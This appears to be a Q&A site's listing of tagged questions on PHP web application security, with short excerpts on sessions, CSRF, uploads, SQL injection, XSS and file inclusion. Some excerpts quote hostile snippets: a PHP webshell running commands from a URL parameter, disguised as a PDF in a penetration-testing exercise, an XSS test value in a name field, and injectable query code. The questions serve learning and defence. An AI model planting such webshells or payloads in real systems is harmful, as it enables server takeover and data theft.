Tagged Questions
2 votes · 1 answer · 98 views
Is this a bot fishing for security vulnerabilities on my site?
I am running a webpage for my family with a feature to track users and guests. Since it's all just family stuff no one ever visits this server, and I hardly see more than 2-3 of us logged on at the ...
1 vote · 0 answers · 113 views
'Ghost' access to a php file on a web server
I'm developing a personal project and one part of the project is a php website, hosted at hostinger as a free plan, that allows clients to ping to it and stores the WAN IP and the NAT IP of them.
...
1 vote · 1 answer · 75 views
Path Truncation not working in PHP while exploiting LFI
From what I understand in PHP '/etc/passwd/' or '/etc/passwd/./././' should be treated just the same as '/etc/passwd'
I am using PHP 5.4 and this does not seem to be true:
php -r ...
9 votes · 6 answers · 4k views
Why is php not used for banking sites or for a banking transaction?
Other programming languages popular on the web, such as Java and .NET, are used for banking sites. However, I've rarely (if ever) seen a PHP application designed to be deployed for a banking site.
...
3 votes · 3 answers · 134 views
Is a web app safe in a non-public folder?
I'm wondering if it's really safe to use this structure of my web application.
WEBAPP
Application
Controllers
Models
Views
...
Framework
...
...
1 vote · 0 answers · 98 views
Failed to connect to netcat reverse shell
I am doing an exercise from PentesterLab, I've got a webshell called 1.pdf, and it can be included in index.php as a PHP file. It contains code like this:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
...
8 votes · 3 answers · 10k views
Is there any SQL injection for this PHP login example?
I want to write a login form, and I got one example from the web.
I want to know, if there is any SQL injection for this code? If there is, what could the exploit's web form entry look like?
This is ...
1 vote · 1 answer · 133 views
WordPress Private Exploit? [closed]
I have a friend who said he has a private exploit for all websites running WordPress. I asked him to take down my private blog, to see if it is real. He couldn't do it. I tried to get some more ...
2 votes · 4 answers · 656 views
Malicious code in image. Harmful?
In my website, a user can upload his profile picture. After analysis of some pictures, I have found some pictures with malicious PHP code, just like the upload script. As an example, I have found a ...
1 vote · 1 answer · 167 views
Have I done enough not to be compromised through image uploading
I know that you can never be sure that you have done enough to be secure, and I also know that file uploading is hard to make correct. Before asking this question I read some of the related posts here ...
0 votes · 0 answers · 38 views
Storing hashed or encrypted password in session? [duplicate]
I need users to be able to encrypt and decrypt without entering their passwords every time.
One way is to store the hashed password in session, and use it for encryption and decryption. Problem with ...
0 votes · 1 answer · 138 views
False Positives- Server side protection against XSS
I read about XSS attacks and its prevention mechanism on server-side. It seems only protection is to sanitize the input by escaping special characters on server side (Using some PHP functions such as ...
0 votes · 1 answer · 153 views
XSS attack vector without forward slash?
Is there an XSS attack vector that allows the inclusion of an external .js file without having to use forward slashes?
Let's say the path of the file is somewebsite.com/js/xss.js
Is there a way to ...
1 vote · 2 answers · 126 views
Is Temporary XSS a Problem?
I use a site on a regular basis so I wanted to make sure it was secure. One of the things I checked was that when I changed my first name to <img src="http://blah.blah/blah/blah.notanextension" ...
0 votes · 1 answer · 114 views
Removing Unnecessary Services & Packages in a MySQL Ubuntu 12.04 Server [closed]
As part of hardening a MySQL 5.6 server running on Ubuntu 12.04 LTS, unnecessary services and packages will have to be removed.
For a server that is serving only as a MySQL server, what services and ...
0 votes · 1 answer · 115 views
Possible ways of exploiting PHP register_globals [closed]
I have a PHP script that executes a bunch of commands to verify that a user is logged in.
if (( isset ($password) && $password!="" && auth($password,$hidden_password)==1) || ...
2 votes · 2 answers · 438 views
Unrestricted File Upload - Possible exploits
During a penetration test (exercise) on an IIS web server + MySQL DBMS, I have found an Unrestricted File Upload vulnerability for which I can upload a .php file.
So I have tried to upload a php ...
4 votes · 5 answers · 10k views
Playing with Referrer Header
There are 2 sites:
http://www.site1.com
http://www.site2.com
http://www.site1.com contains link to http://www.site2.com as
<a href="http://www.site2.com/">link</a>
When user clicks ...
0 votes · 1 answer · 107 views
File-structure when using token
I'm using a form-token to secure the validation process of my php-file.
Basically the structure of the php-file looks like this:
if ($_POST) {//form has been submitted?
if (validateFormToken) {
...
2 votes · 1 answer · 146 views
Submit form with token
I have a token that I want to use to prevent direct access of some php-files.
Some of these php-files are loaded via AJAX.
The token is used with a session to secure form submission AND to prevent ...
3 votes · 3 answers · 469 views
Tokenless REST API security concerns
I'm designing an API in PHP/MySQL that, by its design, will not store a user's password in the database and thus does not generate authorization tokens for the client to hold. The reason for this is ...
5 votes · 1 answer · 298 views
Web Applications terminate strings on null-byte
I have just been doing some penetration testing on a site, and I have noticed (and I have noticed before but now seems like a good point to bring it up) that putting a null byte in the search string ...
1 vote · 1 answer · 193 views
PHP gethostbyname security implications
I'm working on a PHP application.
There is a requirement to find IPs by hostname and I have to resort to gethostbynamel for that.
Looks like there is no other way.
I was wondering if there are any ...
1 vote · 1 answer · 254 views
If my website does not take any user input, is there any danger in showing my code and folder structure?
First time posting here; apologies for any mistakes I've made, please edit, retag, migrate as appropriate.
I have a simple homepage whose purpose is (essentially) to contain my contact info and some ...
-4 votes · 3 answers · 285 views
PHP web application security [closed]
I am building a PHP web application, that needs enhanced security, due to the fact that it contains very sensitive information (in a database).
I think that I want to use self-signed SSL ...
34 votes · 5 answers · 4k views
How to Securely Implement a “Remember Me” Feature?
Assuming you already have a website that implements all of the standard login stuff, what is the correct and most secure way to allow users to automatically be logged in for a certain time period ...
7 votes · 4 answers · 786 views
Security attacks on PHP web applications
I know about following security attacks on php applications (html,php,js).
XSS
SQL Injection
CSRF
Session Hijacking /Fixation
Code Injection
Remote file injection
Should I know about any other or ...
8 votes · 4 answers · 713 views
How dangerous is it to store password in plain text on sites like GitHub?
I have a few private repositories set up on GitHub for some of the projects I am working on for my company. These applications connect to databases and I have database authentication credentials ...
0 votes · 1 answer · 284 views
Site Hacked - Where to go from here? [closed]
Our Magento-based e-commerce site was hacked over the weekend, the hackers managed to gain access to the Magento files and embed some scrambled code into the get.php file in the root directory.
I ...
0 votes · 1 answer · 81 views
Security comparisons between two approaches: how to distinguish FUD from Substance? [closed]
Background:
WorkerB and Tymac were discussing the pros-and-cons of using two different alternatives for extending a web content management system that is used in their company.
Alternative one ...
1 vote · 2 answers · 136 views
Secure certain data on my webserver
I've developed a website where people add their sensitive data. Not credit cards, but let's say they share things about themselves which are private and it wouldn't be good if other people see that ...
8 votes · 3 answers · 5k views
Is it possible to execute a php script in an image file? [duplicate]
I have an image upload php website. Users can upload images to my website. A user claims he can hack my website using an uploaded image.
I opened all the images that he uploaded to my server with ...
15 votes · 4 answers · 10k views
How to hijack a session?
Despite the blatant title of the question, this is actually for a genuine purpose.
My site uses PHP code like this:
$select="select id from tableA where user_id='".$_SESSION['sess_user_id']."'";
...
0 votes · 2 answers · 160 views
How to find injected code in SQL
Recently one of my sites was hacked. The hacker used SQL injection to compromise the security. After getting SQL access he injected code in many places in the database. I cleaned up many of them. But I am ...
12 votes · 4 answers · 2k views
Is $_SERVER[ ] a safe source of data in PHP?
Can I 100% rely on $_SERVER[] to be a safe source of data that I do not need to sanitize like I do $_GET[] and $_POST[]?
Thanks.
OVERVIEW OF RESPONSES:
So it seems there is a consensus that some ...
1 vote · 1 answer · 1k views
ASP.net vs PHP security? [closed]
I have been told that generally speaking, asp.net web apps tend to be more secure than php, since asp.net has some automatic security measures, for example, by default it doesn't allow remote file ...
2 votes · 4 answers · 365 views
When logging out of a website is anything else required than destroying the session?
In PHP, I'm not sure if I should start the session before destroying it when a user wants to log out.
session_start();
session_destroy();
Is there anything else that needs to be done?
EDIT: I ...
3 votes · 3 answers · 383 views
Is it safe to allow external images to be attached to a blog or any web content?
I am filtering all images that are attached to any content of my blog:
Check for file extension.
Check content type using $finfo = finfo_open(FILEINFO_MIME_TYPE);
I also save the image temporarily on my ...
2 votes · 2 answers · 518 views
How to bypass “header” in php
While reading an article I encountered an interesting thing I did not know about:
if(!isset($_SESSION['usr_id']) || !isset($_SESSION['usr_name']))
{
header('Location: index.php');
}
...Which ...
4 votes · 1 answer · 542 views
CodeIgniter CSRF confusion
I have been working with CodeIgniter for about 3 weeks and am very well on the way to loving this framework. However I have been looking at the core code of the framework and I was reading over the ...
-1 votes · 1 answer · 147 views
setting up website for logged in users, anyone, and files no one should see (via the web) [closed]
I asked how to prevent not logged in users from seeing certain content but the solution I chose to implement encountered a problem. I chose to make my root directory for the server C:\WAMP\www\public ...
0 votes · 2 answers · 267 views
How to restrict web access to certain countries
What are the better ways of filtering access to the web application based on geographical location? Is it possible with a network layer firewall or do we need an application layer?
0 votes · 2 answers · 192 views
Is this code vulnerable?
I have developed the PHP code given below. I would like to know what security vulnerabilities are present within this PHP code?
<?php
if(isset($_SESSION['id'])){
// get data ...
1 vote · 1 answer · 135 views
Client vs Server security for business critical application (crossplatform)
We have the option to develop a software either based on
Java (but then it is only available for desktop clients using Java SE and can run maybe also as tomcat app can be multithreaded, stable, ...
0 votes · 1 answer · 266 views
Protect database resources from fake data inputs via web forms
Scenario:
I'm working on a project that needs to accept large amounts of data (customer data) from its users. So it can be normal to have a user trying to add 10,000 or 100,000 records at a time. In ...
19 votes · 5 answers · 2k views
Should I use Suhosin for PHP?
Suhosin can be used to increase the security of your php application.
I can really see the use of it when you are using shared hosts, with multiple (possibly evil) people running their PHP apps ...
2 votes · 1 answer · 210 views
Is it safe to invoke PHP GD functions if you don't know whether a file is a valid image?
There is an image upload function in a web application. After an image is uploaded, it's resized using functions from PHP GD like imagecopyresampled and others. Before invocation of PHP GD's functions there ...
1 vote · 1 answer · 203 views
Is it possible to inject php code to roundcube errors log file via LFI vulnerability? [closed]
I tried to inject php code into the roundcube errors log file, with no success. I think there is something filtering injected php code.
5 votes · 4 answers · 1k views
Protecting against CSRF when a form is being submitted via an AJAX call
I'm using anti-CSRF tokens on all my forms to prevent CSRF attacks. Also, the tokens are being saved in the $_COOKIE variable to validate against the value I get from the form. I'm resetting the token ...
4 votes · 2 answers · 1k views
How to find and protect against the exploited vulnerability in a PHP application based on the logged URL?
I have been attacked on a shared host server and they said I should configure my own php.ini file properly.
I have a little PHP/MySQL program with a registering function, a little admin site.
...